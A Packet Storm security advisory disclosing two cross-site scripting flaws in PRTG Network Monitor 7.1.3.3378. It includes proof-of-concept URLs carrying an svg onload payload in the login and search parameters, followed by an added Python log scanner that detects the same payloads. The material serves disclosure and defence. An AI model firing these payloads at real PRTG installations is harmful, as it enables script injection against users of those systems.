Source: packetstorm | Author: Rafael Pedrero | ID: PACKETSTORM:151925
Published: Mar 01, 2019 - 12:00 a.m.

PRTG Network Monitor 7.1.3.3378 Cross Site Scripting

2019-03-01 00:00:00
Rafael Pedrero
packetstormsecurity.com

EPSS: 0.002 (Low), percentile 58.8%

`In 2009...  
  
<!--  
# Exploit Title: Cross Site Scripting in PRTG Network Monitor v7.1.3.3378  
# Date: 17-02-2019  
# Exploit Author: Rafael Pedrero  
# Vendor Homepage: http://www.paessler.com/prtg  
# Software Link: http://www.paessler.com/prtg  
# Version: PRTG Network Monitor v7.1.3.3378  
# Tested on: All  
# CVE : CVE-2019-9206  
# Category: webapps  
  
1. Description  
  
PRTG Network Monitor v7.1.3.3378 allows XSS via the errormsg or loginurl  
parameter of /public/login.htm. NOTE: This product is discontinued. Update  
to the latest version.  
  
  
2. Proof of Concept  
  
http://X.X.X.X/public/login.htm?errormsg=&loginurl=%22%3E%3Csvg%20onload=prompt%28/XSS/%29%3E  
http://X.X.X.X/public/login.htm?errormsg=%22%3E%3Csvg%20onload=prompt%28/XSS/%29%3E&loginurl=XSS  
  
  
3. Solution:  
  
The product is discontinued. Update to the latest version.  
  
-->  
  
<!--  
# Exploit Title: Cross Site Scripting in PRTG Network Monitor v7.1.3.3378  
# Date: 17-02-2019  
# Exploit Author: Rafael Pedrero  
# Vendor Homepage: http://www.paessler.com/prtg  
# Software Link: http://www.paessler.com/prtg  
# Version: PRTG Network Monitor v7.1.3.3378  
# Tested on: All  
# CVE : CVE-2019-9207  
# Category: webapps  
  
1. Description  
  
PRTG Network Monitor v7.1.3.3378 allows XSS via the searchtext parameter  
of /search.htm. NOTE: This product is discontinued. Update to the latest version.  
  
  
2. Proof of Concept  
  
http://X.X.X.X/search.htm?searchtext=%22%3E%3Csvg%20onload=prompt%28/XSS/%29%3E  
  
3. Solution:  
  
The product is discontinued. Update to the latest version.  
  
-->  
  
  
`
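A log check for the parameters named in the two advisories, as an added example that is not part of the original advisory: it scans web access logs for requests to /public/login.htm and /search.htm whose errormsg, loginurl or searchtext value decodes to markup. The combined log format, the sample lines (which reuse the advisory's own query strings) and the function names are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Endpoint -> parameters named in the two advisories.
WATCHED = {
    "/public/login.htm": {"errormsg", "loginurl"},
    "/search.htm": {"searchtext"},
}
# Heuristic: angle brackets or an event-handler attribute in a decoded value.
MARKUP = re.compile(r"[<>]|\bon\w+\s*=", re.I)
# Request field of a combined-format access log line (format is an assumption).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample lines; addresses are from the documentation range.
SAMPLE = [
    '192.0.2.10 - - [01/Mar/2019:10:00:00 +0000] "GET /public/login.htm?errormsg=&loginurl=%2Findex.htm HTTP/1.1" 200 5120',
    '192.0.2.44 - - [01/Mar/2019:10:02:11 +0000] "GET /public/login.htm?errormsg=&loginurl=%22%3E%3Csvg%20onload=prompt%28/XSS/%29%3E HTTP/1.1" 200 5301',
    '192.0.2.44 - - [01/Mar/2019:10:02:30 +0000] "GET /search.htm?searchtext=%22%3E%3Csvg%20onload=prompt%28/XSS/%29%3E HTTP/1.1" 200 4410',
    '192.0.2.10 - - [01/Mar/2019:10:05:42 +0000] "GET /search.htm?searchtext=core+switch HTTP/1.1" 200 4102',
]

def decode(value, rounds=3):
    """Percent-decode until stable so nested encoding cannot hide markup."""
    for _ in range(rounds):
        nxt = unquote(value)
        if nxt == value:
            break
        value = nxt
    return value

def scan(lines):
    """Return (line_no, path, param, decoded_value) for each suspicious request."""
    hits = []
    for no, line in enumerate(lines, 1):
        m = REQUEST.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        params = WATCHED.get(url.path.lower())
        if not params:
            continue
        for name, raw in parse_qsl(url.query, keep_blank_values=True):
            value = decode(raw)  # parse_qsl has already decoded one layer
            if name.lower() in params and MARKUP.search(value):
                hits.append((no, url.path, name, value))
    return hits

if __name__ == "__main__":
    for hit in scan(SAMPLE):
        print(hit)
```
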
